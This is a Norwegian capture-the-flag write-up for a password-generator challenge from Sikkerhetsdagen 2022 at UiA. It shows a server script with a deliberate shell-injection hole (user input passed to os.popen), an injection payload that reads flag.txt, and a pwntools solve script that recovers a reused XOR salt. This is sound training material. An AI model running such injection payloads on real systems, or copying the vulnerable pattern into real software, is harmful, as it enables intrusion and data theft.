View on GitHub

Sikkerhetsdagen 2022 CTF @ UiA

Sikker passord generator

Sikker passord generator

Viser seg at det var en liten feil i første versjon av min passord generator, ved å legge inn litt mer komplisert generering tror jeg den nå er trygg. Bare å benytte deg av den nå for å lage passord!

ctf.uiactf.no:5003

File: server.py


Dette er en videreutviklet versjon av Passord generator, se writeup for mer detaljer.

server.py

#!/usr/bin/python3
import random
import os

super_salt = str(random.getrandbits(50) + 1)

print("Velkommen til min superpassordmaskin9000v2!\n\
Gi meg en string som skal være med på å lage et nytt passord så skal jeg gi deg et skikkelig godt passord tilbake.\n\
(Begrenset til kun 2 ganger hver sesjon pga. sikkerhet..)")

for encryption_rounds in range(2):

  print(f"String:")
  input_from_client = input('> ')
  sha256_output = os.popen(f'echo "{input_from_client}" | sha256sum').read()
  
  i = 0
  while len(super_salt) < len(sha256_output):
    super_salt += super_salt[i]
    i += 1

  new = [(hex(ord(a) ^ ord(b)))[2:] for a,b in zip(super_salt, sha256_output)]


  print(f"Her er ditt gode password:\n> {''.join(new)}")

Vi har fortsatt samme command line injection-sårbarheten. Forskjellen denne gangen er at output’en blir XOR‘et med et random salt.

Sårbarheten her er at vi får lov å generere to passord i slengen og at samme saltet benyttes begge gangene.

Ved å sende inn en kjent string, f.eks. X antall mellomrom, kan vi ved å XORe outputten vi får tilbake med den kjente strengen vår, finne det opprinnelige saltet.

Når vi da sender inn en payload for å lese ut flagget vil vi få ut flagget XORet med samme salt som sist, som vi nå besitter.

Da XOR‘er vi flaggdataen med saltet og vipps så har vi flagget.

Vi må fortsatt huske å omgå ` sha256sum i kommandolinjen ved å benytte ”; #` i slutten av payloaden vår. Det gjelder også den opprinnelige payloaded med kjent input.

solve.py

from binascii import unhexlify
from pwn import *

io = connect("ctf.uiactf.no", 5003)
io.recvuntil(b'> ').decode()

# Send 50 mellomrom (0x20) og avslutt med '"; #' for å bypasse sha256sum
io.sendline(b'\x20' * 50 + b'"; #')

# Motta nøkkel XOR'ed med 0x20
io.recvline().decode()
io.recvuntil(b'> ').decode()
key_xor_space = io.recvline(False).decode()
#print(key_xor_space)
key_xor_space = unhexlify(key_xor_space)
#print(key_xor_space)

io.recvuntil(b'> ').decode()

# Send payload for å lese ut flagg
io.sendline(b'$(cat flag.txt)"; #')

# Motta flagg XOR'ed med nøkkel
io.recvline().decode()
io.recvuntil(b'> ').decode()
flag_xor_key = io.recvline(False).decode()
#print(flag_xor_key)
flag_xor_key = unhexlify(flag_xor_key)
#print(flag_xor_key)

# XOR nøkkel med 0x20 for å finne ekte nøkkel
key = [i ^ 0x20 for i in key_xor_space]

# XOR flagg med ekte nøkkel for å finne flagg
flag = [flag_xor_key[i] ^ key[i] for i in range(len(flag_xor_key))]

# print(key_xor_space)
# print(key)
# print(flag_xor_key)
# print(flag)
print(''.join(map(chr, flag)))

La oss teste:

$ python solve.py 
[+] Opening connection to ctf.uiactf.no on port 5003: Done
UIACTF{two_times_are_one_too_many}

Flagg

`UIACTF{two_times_are_one_too_many}